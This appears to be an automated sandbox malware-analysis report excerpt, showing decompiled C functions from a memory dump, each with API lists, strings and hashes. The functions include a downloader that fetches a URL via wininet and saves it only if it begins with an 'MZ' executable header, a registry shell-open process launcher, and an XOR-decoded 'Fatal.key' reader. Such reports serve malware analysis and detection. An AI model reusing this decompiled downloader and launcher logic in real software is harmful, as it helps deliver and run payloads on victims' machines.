						if(_t70 != 0) {
							L13:
							lstrcpyA(_t70, _a4);
							L14:
							__eflags = _a8;
							_t98 = 0x10;
							memset( &(_v76.lpReserved), 0, _t98 << 2);
							_v76.cb = 0x44;
							if(__eflags == 0) {
								_v76.dwFlags = 1;
								_v76.wShowWindow = 0;
							} else {
								_v76.lpDesktop = "WinSta0\\Default";
							}
							CreateProcessA(0,  &_v352, 0, 0, 0, 0, 0, 0,  &_v76,  &_v92);
							return 1;
						}
						_t70 = strstr( &_v352, "%1");
						__eflags = _t70;
						if(_t70 != 0) {
							goto L13;
						}
						lstrcatA( &_v352, " ");
						lstrcatA( &_v352, _a4);
						goto L14;
					}
					goto L9;
				}
				_t109 = _v8;
				_t84 = strlen(_t109);
				while(1) {
					_t84 = _t84 - 1;
					if(_t84 <= 0) {
						goto L7;
					}
					if(_t109[_t84] != 0x20) {
						continue;
					}
					strncpy( &_v612, _t109, _t84);
					_t113 = _t113 + 0xc;
					goto L7;
				}
				goto L7;
			}

0x10004e3e
0x10004e49
0x10004e4f
0x10004e54
0x10004e57
0x10004f5a
0x00000000
0x10004f5a
0x10004e61
0x10004e68
0x10004e70
0x10004e70
0x10004e75
0x10004e77
0x10004e82
0x10004eb8
0x10004ebf
0x10004ee2
0x00000000
0x00000000
0x10004ef1
0x10004f0a
0x10004f19
0x10004f23
0x10004f2a
0x10004f31
0x10004f33
0x10004f35
0x10004f58
0x10004f70
0x10004f82
0x10004f89
0x10004f8c
0x10004fca
0x10004fce
0x10004fd4
0x10004fd8
0x10004fdb
0x10004fdf
0x10004fe1
0x10004fe8
0x10004ff3
0x10004ffa
0x10004fea
0x10004fea
0x10004fea
0x10005014
0x00000000
0x1000501a
0x10004f9a
0x10004fa1
0x10004fa4
0x00000000
0x00000000
0x10004fb2
0x10004fc2
0x00000000
0x10004fc2
0x00000000
0x10004f58
0x10004e84
0x10004e88
0x10004e8f
0x10004e8f
0x10004e92
0x00000000
0x00000000
0x10004e98
0x00000000
0x00000000
0x10004ea3
0x10004ea9
0x00000000
0x10004ea9
0x00000000

APIs

memset.MSVCRT ref: 10004E3E
strrchr.MSVCRT ref: 10004E49
strrchr.MSVCRT ref: 10004E78
strlen.MSVCRT ref: 10004E88
strncpy.MSVCRT ref: 10004EA3
strcpy.MSVCRT(?,?), ref: 10004EB8
memset.MSVCRT ref: 10004EF1
wsprintfA.USER32 ref: 10004F0A
memset.MSVCRT ref: 10004F19
ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 10004F70
strstr.MSVCRT ref: 10004F82
strstr.MSVCRT ref: 10004F9A
lstrcatA.KERNEL32(?,100240FC), ref: 10004FB2
lstrcatA.KERNEL32(?,?), ref: 10004FC2
lstrcpyA.KERNEL32(00000000,?), ref: 10004FCE
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10005014

Strings

"%1, xrefs: 10004F7C
%s\shell\open\command, xrefs: 10004F04
D, xrefs: 10004FE1

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: memset$lstrcatstrrchrstrstr$CreateEnvironmentExpandProcessStringslstrcpystrcpystrlenstrncpywsprintf
String ID: "%1$%s\shell\open\command$D
API String ID: 4079107157-1634606264
Opcode ID: 698231c5c327ca767939ca4a0f4c71d411536def537f38b44b81a0fc1becf60b
Instruction ID: 8dcf384e9a32d756be640af95d6a7f8c8f560dcdc1ec2a4fa039a5fd12ea8055
Opcode Fuzzy Hash: 698231c5c327ca767939ca4a0f4c71d411536def537f38b44b81a0fc1becf60b
Instruction Fuzzy Hash: 7D5130B280465DFFEB10CBA0DC88EDE777CFB44345F1144A6F609E6150DB319A899B60

Uniqueness

Uniqueness Score: -1.00%

Function 1000CF58, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 115
libraryloaderfileCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E1000CF58(void* _a4, CHAR* _a8) {
				char _v5;
				struct _OVERLAPPED* _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				long _v32;
				void _v1056;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t36;
				intOrPtr _t37;
				void* _t38;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t46;
				struct HINSTANCE__* _t55;
				_Unknown_base(*)()* _t58;
				void* _t59;

				_v12 = 0;
				_v32 = 0;
				_v24 = 1;
				_v5 = 1;
				_t55 = LoadLibraryA("wininet.dll");
				_v16 = _t55;
				_t32 = GetProcAddress(_t55, "InternetOpenA");
				_t33 =  *_t32("MSIE 6.0", 0, 0, 0, 0);
				_v20 = _t33;
				if(_t33 == 0) {
					L2:
					if(_t55 != 0) {
						FreeLibrary(_t55);
					}
					return 0;
				}
				_t36 = GetProcAddress(_t55, "InternetOpenUrlA");
				_t37 =  *_t36(_v20, _a4, 0, 0, 0x80000000, 0);
				_v28 = _t37;
				if(_t37 != 0) {
					_t38 = CreateFileA(_a8, 0x40000000, 0, 0, 2, 0, 0);
					_a4 = _t38;
					if(_t38 == 0xffffffff) {
						L13:
						Sleep(1);
						_t39 = GetProcAddress(_t55, "InternetCloseHandle");
						_t58 = _t39;
						 *_t58(_v28);
						 *_t58(_v20);
						if(_t55 != 0) {
							FreeLibrary(_t55);
						}
						return _v5;
					}
					while(1) {
						memset( &_v1056, 0, 0x400);
						_t59 = _t59 + 0xc;
						_t46 = GetProcAddress(_v16, "InternetReadFile");
						 *_t46(_v28,  &_v1056, 0x400,  &_v12);
						if(_v24 != 0 && _v1056 != 0x5a4d) {
							break;
						}
						_v24 = 0;
						WriteFile(_a4,  &_v1056, _v12,  &_v32, 0);
						if(_v12 <= 0) {
							L12:
							CloseHandle(_a4);
							_t55 = _v16;
							goto L13;
						}
					}
					_v5 = 0;
					goto L12;
				}
				goto L2;
			}

0x1000cf6b
0x1000cf6e
0x1000cf71
0x1000cf78
0x1000cf88
0x1000cf90
0x1000cf93
0x1000cf9e
0x1000cfa2
0x1000cfa5
0x1000cfc6
0x1000cfc8
0x1000cfcb
0x1000cfcb
0x00000000
0x1000cfd1
0x1000cfad
0x1000cfbd
0x1000cfc1
0x1000cfc4
0x1000cfe6
0x1000cfef
0x1000cff2
0x1000d067
0x1000d069
0x1000d075
0x1000d07a
0x1000d07c
0x1000d081
0x1000d085
0x1000d088
0x1000d088
0x00000000
0x1000d08e
0x1000cff9
0x1000d002
0x1000d008
0x1000d013
0x1000d024
0x1000d029
0x00000000
0x00000000
0x1000d044
0x1000d04b
0x1000d054
0x1000d05b
0x1000d05e
0x1000d064
0x00000000
0x1000d064
0x1000d056
0x1000d058
0x00000000
0x1000d058
0x00000000

APIs

LoadLibraryA.KERNEL32(wininet.dll,?,00000001), ref: 1000CF7C
GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 1000CF93
GetProcAddress.KERNEL32(00000000,InternetOpenUrlA), ref: 1000CFAD
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 1000CFCB
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,?,00000001), ref: 1000CFE6
memset.MSVCRT ref: 1000D002
GetProcAddress.KERNEL32(?,InternetReadFile), ref: 1000D013
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1000D04B
CloseHandle.KERNEL32(?), ref: 1000D05E
Sleep.KERNEL32(00000001,?,00000001), ref: 1000D069
GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 1000D075
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 1000D088

Strings

InternetOpenUrlA, xrefs: 1000CFA7
InternetOpenA, xrefs: 1000CF8A
MZ, xrefs: 1000D02B
InternetCloseHandle, xrefs: 1000D06F
MSIE 6.0, xrefs: 1000CF99
wininet.dll, xrefs: 1000CF66
InternetReadFile, xrefs: 1000D00B

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWritememset
String ID: InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MSIE 6.0$MZ$wininet.dll
API String ID: 2364563185-3604101231
Opcode ID: cb21d314380c8085da5f6eb4a3685562b0783d1d6f629723c4ae219259380d94
Instruction ID: 32b20c4bfe9705e298af6a30c67622127828331134c2dfee1509319b2e7de13d
Opcode Fuzzy Hash: cb21d314380c8085da5f6eb4a3685562b0783d1d6f629723c4ae219259380d94
Instruction Fuzzy Hash: 9E313CB180021DBEEB119FA0DCC4EBEBFB9EB45294F50806AF619A2150C7314E86CA61

Uniqueness

Uniqueness Score: -1.00%

Function 10014C1E, Relevance: 32.0, APIs: 16, Strings: 2, Instructions: 465
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E10014C1E(signed int* __ecx, char* _a4, signed int _a7, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v5;
				signed int _v12;
				char _v16;
				char _v17;
				char _v18;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				signed char _v29;
				char _v30;
				char _v31;
				char _v32;
				signed int _v36;
				char _v37;
				char _v48;
				void _v60;
				signed int _v64;
				signed int _v68;
				signed char _v76;
				char _v336;
				char _v596;
				signed int _v600;
				void* _v604;
				char* _v608;
				char _v868;
				intOrPtr _v872;
				signed int _v876;
				short _v880;
				short _v882;
				signed short _v884;
				signed int _v888;
				int _v892;
				intOrPtr _v896;
				int _v900;
				signed int _v904;
				signed int _v908;
				signed int _v912;
				unsigned int _v916;
				signed int _v918;
				signed int _v920;
				short _v922;
				void _v924;
				char _v1184;
				void* __ebp;
				char* _t187;
				intOrPtr _t188;
				void* _t189;
				int _t196;
				signed int _t201;
				char _t210;
				char _t212;
				char _t217;
				char _t219;
				char _t224;
				char _t226;
				signed int _t234;
				char _t243;
				intOrPtr _t248;
				signed int _t252;
				void* _t254;
				signed int _t257;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t271;
				signed int _t273;
				signed int _t278;
				signed int _t283;
				int _t285;
				signed char _t288;
				void* _t293;
				signed int _t294;
				void* _t295;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;
				void* _t306;
				void* _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				void* _t335;
				signed int _t350;
				void* _t351;
				char* _t352;
				signed int _t353;
				void* _t354;
				int _t357;
				signed int* _t358;
				void* _t359;
				void* _t360;
				void* _t361;
				void* _t362;

				_t358 = __ecx;
				if(__ecx[5] != 0) {
					return 0x40000;
				}
				__eflags = __ecx[0xb];
				if(__ecx[0xb] == 0) {
					__eflags =  *__ecx;
					_v36 = 0;
					if( *__ecx != 0) {
						__eflags = _a16 - 4;
						if(_a16 != 4) {
							_v36 = 0xc;
						}
					}
					strcpy( &_v1184, _a4);
					__eflags = _v1184;
					if(_v1184 == 0) {
						L89:
						return 0x10000;
					}
					_t187 =  &_v1184;
					do {
						__eflags =  *_t187 - 0x5c;
						if( *_t187 == 0x5c) {
							 *_t187 = 0x2f;
						}
						_t187 = _t187 + 1;
						__eflags =  *_t187;
					} while ( *_t187 != 0);
					__eflags = _a16 - 4;
					_t288 = 1;
					_a7 = _a16 == 4;
					__eflags = _a7;
					if(_a7 == 0) {
						L15:
						_t17 =  &_v5;
						 *_t17 = _v5 & 0x00000000;
						__eflags =  *_t17;
						L16:
						__eflags = _a7;
						_v12 = 8;
						if(_a7 != 0) {
							L18:
							_v12 = 0;
							L19:
							_t188 = _a16;
							__eflags = _t188 - 2;
							if(_t188 != 2) {
								__eflags = _t188 - _t288;
								if(_t188 != _t288) {
									__eflags = _t188 - 3;
									if(_t188 != 3) {
										__eflags = _t188 - 4;
										if(__eflags != 0) {
											goto L89;
										}
										_t189 = E10014935(_t358, _t335, __eflags);
										L27:
										__eflags = _t189;
										if(_t189 != 0) {
											L90:
											return _t189;
										}
										_v64 = 0;
										strcpy( &_v868, 0x100275d0);
										strcpy( &_v596,  &_v1184);
										_t196 = strlen( &_v596);
										_t361 = _t360 + 0x14;
										__eflags = _v5;
										_v900 = _t196;
										if(_v5 != 0) {
											strcat( &_v596, "/");
											_t37 =  &_v900;
											 *_t37 = _v900 + 1;
											__eflags =  *_t37;
										}
										strcpy( &_v336, 0x100275d4);
										__eflags =  *_t358;
										_v600 = 0;
										_v888 = 0;
										_v76 = _t288;
										_v68 = 0;
										_v882 = 0;
										_v924 = 0xb17;
										_v922 = 0x14;
										_v916 = _t358[0x1a];
										_v912 = 0;
										_v920 = 8;
										if( *_t358 != 0) {
											__eflags = _a7;
											if(_a7 == 0) {
												_v920 = 9;
											}
										}
										_v880 = _v920;
										_t201 = _v12;
										__eflags = _t201;
										_v918 = _t201;
										if(_t201 != 0) {
											L36:
											_v908 = 0;
											goto L37;
										} else {
											_t278 = _t358[0x1c];
											__eflags = _t278;
											if(_t278 < 0) {
												goto L36;
											}
											_v908 = _t278 + _v36;
											L37:
											_v904 = _t358[0x1c];
											_v876 = _t358[0x13];
											_v884 = _v884 & 0x00000000;
											_v29 = _v29 & 0x00000000;
											_v872 = _t358[6] + _t358[4];
											_v608 =  &_v32;
											_v604 =  &_v60;
											_v27 = _t358[0x16];
											_t302 = 8;
											_v896 = 0x11;
											_v892 = 9;
											_v32 = 0x55;
											_v31 = 0x54;
											_v30 = 0xd;
											_v28 = 7;
											_t210 = E10015AC0(_t358[0x16], _t302, _t358[0x17]);
											_v26 = _t210;
											_t303 = 0x10;
											_t212 = E10015AC0(_t358[0x16], _t303, _t358[0x17]);
											_v25 = _t212;
											_t304 = 0x18;
											_v24 = E10015AC0(_t358[0x16], _t304, _t358[0x17]);
											_v23 = _t358[0x14];
											_t305 = 8;
											_t217 = E10015AC0(_t358[0x14], _t305, _t358[0x15]);
											_v22 = _t217;
											_t306 = 0x10;
											_t219 = E10015AC0(_t358[0x14], _t306, _t358[0x15]);
											_v21 = _t219;
											_t307 = 0x18;
											_v20 = E10015AC0(_t358[0x14], _t307, _t358[0x15]);
											_v19 = _t358[0x18];
											_t308 = 8;
											_t224 = E10015AC0(_t358[0x18], _t308, _t358[0x19]);
											_v18 = _t224;
											_t309 = 0x10;
											_t226 = E10015AC0(_t358[0x18], _t309, _t358[0x19]);
											_v17 = _t226;
											_t310 = 0x18;
											_v16 = E10015AC0(_t358[0x18], _t310, _t358[0x19]);
											_t103 =  &_v32; // 0x55
											memcpy( &_v60, _t103, 9);
											_push(_t358);
											_push(E100144F5);
											 *((char*)(_v604 + 2)) = 5;
											_push( &_v924);
											_t234 = E100136C7(_t310);
											_t362 = _t361 + 0x18;
											__eflags = _t234;
											if(_t234 == 0) {
												_t358[6] = _t358[6] + _v896 + _v900 + 0x1e;
												__eflags = _t358[5];
												if(_t358[5] == 0) {
													_t350 =  *_t358;
													_t292 =  &(_t358[0xc]);
													__eflags = _t350;
													_t358[0xc] = 0x12345678;
													_t358[0xd] = 0x23456789;
													_t358[0xe] = 0x34567890;
													if(_t350 == 0) {
														L44:
														__eflags =  *0x100275c8;
														if( *0x100275c8 == 0) {
															_t271 = GetDesktopWindow();
															_t357 = _t271 ^ GetTickCount();
															__eflags = _t357;
															srand(_t357);
														}
														_t351 = 0;
														__eflags = 0;
														do {
															 *((char*)(_t359 + _t351 - 0x2c)) = rand() >> 7;
															_t351 = _t351 + 1;
															__eflags = _t351 - 0xc;
														} while (_t351 < 0xc);
														_v37 = _v916 >> 8;
														_t293 = 0;
														__eflags = 0;
														do {
															_t352 = _t359 + _t293 - 0x2c;
															_t243 = E1001409D(__eflags,  &(_t358[0xc]),  *((intOrPtr*)(_t359 + _t293 - 0x2c)));
															_t293 = _t293 + 1;
															__eflags = _t293 - 0xc;
															 *_t352 = _t243;
														} while (__eflags < 0);
														_t294 = 0;
														__eflags =  *_t358;
														if( *_t358 == 0) {
															L56:
															__eflags = 0;
															L57:
															__eflags = _a7;
															_t358[0xb] = 0;
															if(_a7 != 0) {
																_t353 = _v12;
																_t358[0x24] = _t294;
																L64:
																_t358[0xb] = _t358[0xb] & 0x00000000;
																E10014A82(_t358);
																_t315 = _t358[0x24];
																_t189 = _t358[5];
																_t358[6] = _t358[6] + _t315;
																__eflags = _t189;
																if(_t189 != 0) {
																	goto L90;
																}
																__eflags = _t294;
																if(_t294 != 0) {
																	L80:
																	return 0x400;
																}
																_t248 = _v36 + _t315;
																_v912 = _t358[0x1e];
																__eflags = _v908 - _t248;
																_v908 = _t248;
																_t316 = _t315 & 0xffffff00 | _v908 == _t248;
																__eflags = _t358[7] - _t294;
																_v904 = _t358[0x1c];
																if(_t358[7] == _t294) {
																	L75:
																	__eflags = _v918 - _t353;
																	if(_v918 != _t353) {
																		L78:
																		return 0x4000000;
																	}
																	__eflags = _t353;
																	if(_t353 != 0) {
																		L79:
																		_push(_t358);
																		_push(E100144F5);
																		_push( &_v924);
																		_t252 = E10013909(_t316);
																		__eflags = _t252;
																		if(_t252 == 0) {
																			_t171 =  &(_t358[6]);
																			 *_t171 = _t358[6] + 0x10;
																			__eflags =  *_t171;
																			_v920 = _v880;
																			L82:
																			_t189 = _t358[5];
																			__eflags = _t189;
																			if(_t189 != 0) {
																				goto L90;
																			}
																			_push(_v892);
																			L10015806();
																			_t354 = _t189;
																			_t254 = memcpy(_t354, _v604, _v892);
																			_v604 = _t354;
																			_push(0x360);
																			L10015806();
																			_t295 = _t254;
																			memcpy(_t295,  &_v924, 0x360);
																			_t257 = _t358[0x11];
																			__eflags = _t257;
																			if(_t257 != 0) {
																				while(1) {
																					_t317 =  *(_t257 + 0x35c);
																					__eflags = _t317;
																					if(_t317 == 0) {
																						break;
																					}
																					_t257 = _t317;
																				}
																				 *(_t257 + 0x35c) = _t295;
																				L88:
																				return 0;
																			}
																			_t358[0x11] = _t295;
																			goto L88;
																		}
																		goto L80;
																	}
																	__eflags = _t316;
																	if(_t316 != 0) {
																		goto L79;
																	}
																	goto L78;
																}
																__eflags =  *_t358 - _t294;
																if( *_t358 == _t294) {
																	L69:
																	__eflags = _v920 & 0x00000001;
																	_v918 = _t353;
																	if((_v920 & 0x00000001) == 0) {
																		_t160 =  &_v920;
																		 *_t160 = _v920 & 0x0000fff7;
																		__eflags =  *_t160;
																	}
																	_t318 = _t358;
																	_v880 = _v920;
																	_t262 = E100145E0(_t358, _v872 - _t358[4]);
																	__eflags = _t262;
																	if(_t262 == 0) {
																		L74:
																		return 0x2000000;
																	} else {
																		_push(_t358);
																		_push(E100144F5);
																		_push( &_v924);
																		_t265 = E100136C7(_t318);
																		__eflags = _t265;
																		if(_t265 != 0) {
																			goto L80;
																		}
																		_t266 = E100145E0(_t358, _t358[6]);
																		__eflags = _t266;
																		if(_t266 != 0) {
																			goto L82;
																		}
																		goto L74;
																	}
																}
																__eflags = _a7 - _t294;
																if(_a7 == _t294) {
																	goto L75;
																}
																goto L69;
															}
															_t353 = _v12;
															__eflags = _t353 - 8;
															if(_t353 != 8) {
																__eflags = _t353;
																if(_t353 != 0) {
																	goto L64;
																}
																_t267 = E10014BBC(_t358);
																L60:
																_t294 = _t267;
																goto L64;
															}
															_push( &_v924);
															_t267 = E10014AC4(_t358);
															goto L60;
														}
														__eflags = _a7;
														if(_a7 == 0) {
															E100144F5(_t358,  &_v48, 0xc);
															_t362 = _t362 + 0xc;
															_t130 =  &(_t358[6]);
															 *_t130 = _t358[6] + 0xc;
															__eflags =  *_t130;
														}
														__eflags =  *_t358 - _t294;
														if( *_t358 == _t294) {
															goto L56;
														} else {
															__eflags = _a7;
															if(_a7 != 0) {
																goto L56;
															}
															_push(1);
															_pop(0);
															goto L57;
														}
													} else {
														goto L42;
													}
													while(1) {
														L42:
														_t273 =  *_t350;
														__eflags = _t273;
														if(_t273 == 0) {
															goto L44;
														}
														E1001402A(_t292, _t273);
														_t350 = _t350 + 1;
														__eflags = _t350;
														if(_t350 != 0) {
															continue;
														}
														goto L44;
													}
													goto L44;
												}
												E10014A82(_t358);
												return _t358[5];
											}
											E10014A82(_t358);
											goto L80;
										}
									}
									_push(_a12);
									_push(_a8);
									_t189 = E10014879(_t358);
									goto L27;
								}
								_push(_a12);
								_push(_a8);
								_t189 = E10014761(_t358, _t335);
								goto L27;
							}
							_t189 = E100146DE(_t358, _a8);
							goto L27;
						}
						_t283 = E100140C2( &_v1184);
						__eflags = _t283;
						if(_t283 == 0) {
							goto L19;
						}
						goto L18;
					}
					_t285 = strlen( &_v1184);
					__eflags =  *((char*)(_t359 + _t285 - 0x49d)) - 0x2f;
					if( *((char*)(_t359 + _t285 - 0x49d)) == 0x2f) {
						goto L15;
					}
					_v5 = _t288;
					goto L16;
				} else {
					return 0x50000;
				}
			}

0x10014c2a
0x10014c31
0x00000000
0x10014c33
0x10014c3d
0x10014c41
0x10014c4d
0x10014c4f
0x10014c52
0x10014c54
0x10014c58
0x10014c5a
0x10014c5a
0x10014c58
0x10014c6b
0x10014c70
0x10014c79
0x10015220
0x00000000
0x10015220
0x10014c7f
0x10014c85
0x10014c85
0x10014c88
0x10014c8a
0x10014c8a
0x10014c8d
0x10014c8e
0x10014c8e
0x10014c93
0x10014c99
0x10014c9a
0x10014c9e
0x10014ca2
0x10014cc0
0x10014cc0
0x10014cc0
0x10014cc0
0x10014cc4
0x10014cc4
0x10014cc8
0x10014ccf
0x10014ce2
0x10014ce2
0x10014ce5
0x10014ce5
0x10014ce8
0x10014ceb
0x10014cf9
0x10014cfb
0x10014d0c
0x10014d0f
0x10014d20
0x10014d23
0x00000000
0x00000000
0x10014d2b
0x10014d30
0x10014d30
0x10014d32
0x10015229
0x10015229
0x10015229
0x10014d44
0x10014d47
0x10014d5a
0x10014d66
0x10014d6b
0x10014d6e
0x10014d72
0x10014d78
0x10014d86
0x10014d8b
0x10014d8b
0x10014d8b
0x10014d92
0x10014d9f
0x10014da7
0x10014daa
0x10014db1
0x10014db7
0x10014dba
0x10014dbd
0x10014dc4
0x10014dcd
0x10014dd6
0x10014ddc
0x10014de2
0x10014deb
0x10014ded
0x10014df1
0x10014df3
0x10014df3
0x10014df1
0x10014e03
0x10014e0a
0x10014e0d
0x10014e0f
0x10014e16
0x10014e2c
0x10014e2c
0x00000000
0x10014e18
0x10014e18
0x10014e1b
0x10014e1d
0x00000000
0x00000000
0x10014e24
0x10014e32
0x10014e38
0x10014e41
0x10014e50
0x10014e58
0x10014e5c
0x10014e65
0x10014e6e
0x10014e79
0x10014e7c
0x10014e81
0x10014e8b
0x10014e95
0x10014e99
0x10014e9d
0x10014ea1
0x10014ea5
0x10014eac
0x10014eaf
0x10014eb4
0x10014ebb
0x10014ebe
0x10014ece
0x10014ed6
0x10014ed9
0x10014ede
0x10014ee5
0x10014ee8
0x10014eed
0x10014ef4
0x10014ef7
0x10014f07
0x10014f0f
0x10014f12
0x10014f17
0x10014f1e
0x10014f21
0x10014f26
0x10014f2d
0x10014f30
0x10014f3a
0x10014f3d
0x10014f47
0x10014f52
0x10014f53
0x10014f58
0x10014f62
0x10014f63
0x10014f68
0x10014f6b
0x10014f6d
0x10014f8b
0x10014f8e
0x10014f92
0x10014fa3
0x10014fa5
0x10014fa8
0x10014faa
0x10014fb0
0x10014fb7
0x10014fbe
0x10014fd2
0x10014fd2
0x10014fd9
0x10014fdb
0x10014fe9
0x10014fe9
0x10014fec
0x10014ff2
0x10014ff3
0x10014ff3
0x10014ff5
0x10014ffe
0x10015002
0x10015003
0x10015003
0x10015011
0x10015014
0x10015014
0x10015016
0x1001501a
0x10015023
0x10015028
0x1001502a
0x1001502e
0x1001502e
0x10015032
0x10015034
0x10015036
0x1001505f
0x1001505f
0x10015061
0x10015061
0x10015065
0x10015068
0x10015091
0x10015094
0x1001509a
0x1001509a
0x100150a0
0x100150a5
0x100150ab
0x100150ae
0x100150b1
0x100150b3
0x00000000
0x00000000
0x100150b9
0x100150bb
0x10015196
0x00000000
0x10015196
0x100150c7
0x100150c9
0x100150cf
0x100150d5
0x100150de
0x100150e1
0x100150e4
0x100150ea
0x10015162
0x10015162
0x10015169
0x10015173
0x00000000
0x10015173
0x1001516b
0x1001516d
0x1001517d
0x1001517d
0x10015184
0x10015189
0x1001518a
0x10015192
0x10015194
0x100151a7
0x100151a7
0x100151a7
0x100151ab
0x100151b2
0x100151b2
0x100151b5
0x100151b7
0x00000000
0x00000000
0x100151b9
0x100151bf
0x100151ca
0x100151d3
0x100151d8
0x100151e3
0x100151e4
0x100151e9
0x100151f4
0x100151f9
0x100151ff
0x10015201
0x10015208
0x10015208
0x1001520e
0x10015210
0x00000000
0x00000000
0x10015212
0x10015212
0x10015216
0x1001521c
0x00000000
0x1001521c
0x10015203
0x00000000
0x10015203
0x00000000
0x10015194
0x1001516f
0x10015171
0x00000000
0x00000000
0x00000000
0x10015171
0x100150ec
0x100150ee
0x100150f5
0x100150f5
0x100150fc
0x10015103
0x10015105
0x10015105
0x10015105
0x10015105
0x10015115
0x10015117
0x10015128
0x1001512d
0x1001512f
0x10015158
0x00000000
0x10015131
0x10015131
0x10015138
0x1001513d
0x1001513e
0x10015146
0x10015148
0x00000000
0x00000000
0x1001514f
0x10015154
0x10015156
0x00000000
0x00000000
0x00000000
0x10015156
0x1001512f
0x100150f0
0x100150f3
0x00000000
0x00000000
0x00000000
0x100150f3
0x1001506a
0x1001506d
0x10015070
0x10015084
0x10015086
0x00000000
0x00000000
0x1001508a
0x10015080
0x10015080
0x00000000
0x10015080
0x1001507a
0x1001507b
0x00000000
0x1001507b
0x10015038
0x1001503b
0x10015044
0x10015049
0x1001504c
0x1001504c
0x1001504c
0x1001504c
0x10015050
0x10015052
0x00000000
0x10015054
0x10015054
0x10015058
0x00000000
0x00000000
0x1001505a
0x1001505c
0x00000000
0x1001505c
0x00000000
0x00000000
0x00000000
0x10014fc0
0x10014fc0
0x10014fc0
0x10014fc2
0x10014fc4
0x00000000
0x00000000
0x10014fc8
0x10014fce
0x10014fce
0x10014fd0
0x00000000
0x00000000
0x00000000
0x10014fd0
0x00000000
0x10014fc0
0x10014f96
0x00000000
0x10014f9b
0x10014f71
0x00000000
0x10014f71
0x10014e16
0x10014d11
0x10014d16
0x10014d19
0x00000000
0x10014d19
0x10014cfd
0x10014d02
0x10014d05
0x00000000
0x10014d05
0x10014cf2
0x00000000
0x10014cf2
0x10014cd8
0x10014cdd
0x10014ce0
0x00000000
0x00000000
0x00000000
0x10014ce0
0x10014cab
0x10014cb0
0x10014cb9
0x00000000
0x00000000
0x10014cbb
0x00000000
0x10014c43
0x00000000
0x10014c43

Strings

UT, xrefs: 10014F3D, 10014F42
/, xrefs: 10014CB0

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: fdcae69413471f4598ab77be23f56aff6e40d23898a828140ce77f9435cb75f2
Instruction ID: 86191efd182d6e22b62547ce43d47440f9584d39fdbd5b6f0f4742f38c7f9e36
Opcode Fuzzy Hash: fdcae69413471f4598ab77be23f56aff6e40d23898a828140ce77f9435cb75f2
Instruction Fuzzy Hash: 3A02F175900358DBDB22CFA4C88078EBBF8EF05305F19449EE449AF252DB71EAC88B51

Uniqueness

Uniqueness Score: -1.00%

Function 10008B51, Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 97
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E10008B51(intOrPtr __ecx) {
				void* _v8;
				long _v12;
				intOrPtr _v16;
				char _v276;
				void* _t32;
				void* _t35;
				void* _t38;
				void* _t39;
				void* _t49;
				long _t50;
				void* _t52;

				_v16 = __ecx;
				_t49 = 0;
				_v12 = 0;
				 *0x100273bc(0,  &_v276, 0x1c, 0);
				if(PathFileExistsA( &_v276) == 0) {
					PathStripToRootA( &_v276);
					strcat( &_v276, "Windows\\");
					strcat( &_v276, "Fatal");
					_push(".key");
				} else {
					strcat( &_v276, 0x10024988);
					strcat( &_v276, "Fatal");
					_push(".key");
				}
				strcat( &_v276, ??);
				_t32 = CreateFileA( &_v276, 0x80000000, 1, 0, 3, 0x80, 0);
				_v8 = _t32;
				if(_t32 != 0xffffffff) {
					_t35 = GetFileSize(_t32, 0);
					_t50 = _t35;
					_push(_t50);
					L10015806();
					_t52 = _t35;
					ReadFile(_v8, _t52, _t50,  &_v12, 0);
					_t38 = 0;
					if(_t50 > 0) {
						do {
							 *(_t38 + _t52) =  *(_t38 + _t52) ^ 0x00000062;
							_t38 = _t38 + 1;
						} while (_t38 < _t50);
					}
					_t39 = E10008B06(_v16, _t52, _t50);
					_push(_t52);
					_t49 = _t39;
					L10015800();
				}
				CloseHandle(_v8);
				return _t49;
			}

0x10008b68
0x10008b6c
0x10008b6e
0x10008b71
0x10008b86
0x10008bb8
0x10008bca
0x10008bdb
0x10008be0
0x10008b88
